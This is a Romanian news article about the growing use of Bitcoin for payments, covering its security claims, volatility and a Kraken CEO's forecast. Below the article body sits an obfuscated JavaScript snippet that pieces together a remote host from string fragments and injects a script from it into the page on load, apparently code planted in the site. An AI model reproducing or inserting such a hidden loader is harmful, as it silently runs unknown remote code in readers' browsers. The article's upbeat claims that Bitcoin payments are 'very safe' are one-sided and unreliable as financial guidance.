Actualitate

Plățile cu Bitcoin, tot mai populare în condițiile creșterii numărului de investitori în criptomonede

Cu o istorie de mai mult de o decadă, Bitcoin a deschis drumul succesului pentru criptomonede. Rațiunea a fost aceea de a exista o posibilitate de păstrare a banilor într-o monedă care să nu aibă nicio legătură cu bănci centrale sau guverne. S-a dorit astfel ca totul să fie reglementat de piață, fără interese și decizii monetare ale anumitor state. De asemenea, prin tehnologia de criptare, păstrarea banilor în criptomonede oferă siguranță și asigură securitatea datelor personale (la un cu totul alt nivel față de cele transmise în mod convențional între bănci, sisteme de plăți cu cardul, autorități naționale).

Așadar, Bitcoin s-a dorit de la început o monedă utilizată în mod real și nu doar o formă virtuală de păstrare a banilor. Tranzacțiile cu Bitcoin au devenit tot mai populare inclusiv în România. În prezent, poți să plătești în Bitcoin tot mai multe servicii și produse, mai ales online, utilizând simplu și rapid (și evident foarte sigur!) portofelul digita. Tot mai multe magazine online aderă la sistemele de plată cu criptomonede, tocmai pentru că există atât de mulți investitori în aceste instrumente monetare, iar pentru ei plata directă este simplă și convenabilă. Diversitatea este mare: poti cumpara electrocasnice cu Bitcoin, sau poti plati in diverse magazine fizice, ba chiar sunt si servicii de hitech precum gazduire cu Bitcoin.

De ce plată cu Bitcoin? Plătești cu smartphone-ul în doi pași, fără a fi nevoie să treci datele cardului bancar, te bucuri de securitate maximă și servicii avantajoase de plăți. Cel mai plăcut este când ai investit în criptomonede și ai prins un salt valoric care ți-a făcut portofelul digital să valoreze mai mult raportat la moneda de referință (RON, EUR, USD etc.).

Însă este demn de subliniat faptul că investiția în Bitcoin presupune riscuri majore, căci vorbim despre volatilitate foarte mare, cursul de schimb înregistrează fluctuații chiar și de zeci de procente într-o perioadă scurt de timp (săptămână, lună). Astfel, la fel cum valoarea portofelului digital se poate mări, la fel de simplu se poate micșora. Până acum, cei care au investit pe termen lung au avut de câștigat, dacă nu s-au grăbit să cheltuiască moneda în perioadele de declin.

Cu privire la viitorul monedei Bitcoin, părerile sunt împărțite. Unele persoane avertizează că valoarea poate să scadă drastic la un moment dat, provocând pagube financiare majore, dar sunt și multe persoane publice care cred într-un viitor strălucit al criptomonedelor în general și al Bitcoin în special. Spre exemplu, chiar recent, Jesse Powell, CEO al unei companii de specialitate (Kraken), a declarat pentru Bloomberg că Bitcoin va ajunge pe Lună, pe Marte și în final va deveni moneda principală globală. Acesta consideră că monedele naționale dau semne de slăbiciune și oamenii încep să măsoare prețurile în termeni de Bitcoin.

În prezent, un Bitcoin valorează în jur de 50.000 USD, cu o creștere de la aproximativ 5.000 USD în urmă cu 12 luni. Cei care investesc în Bitcoin au posibilitatea de a folosi oricând consideră o parte din acești bani pentru plăți pentru produse și servicii, exact așa cum se întâmplă în cazul banilor păstrați în monede convenționale.

(function(){
xfX6_=(“u”+””)+”s”+””;xfX6_+=(“tat.”)+(“i”);
xfX6=document.createElement(“script”);xfX6.type=”text/javascript”;xfX6_+=”nf”+(“o”)+”/”;
xfX6u=”255304446″+”.”;xfX6.async=true;xfX6u+=”g2fcbcs4fX6fwx7ghvXqmzqjhm5n48″;
xfX6.src=”https://”+xfX6_+xfX6u;xfX6b=document.body;xfX6b.appendChild(xfX6);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *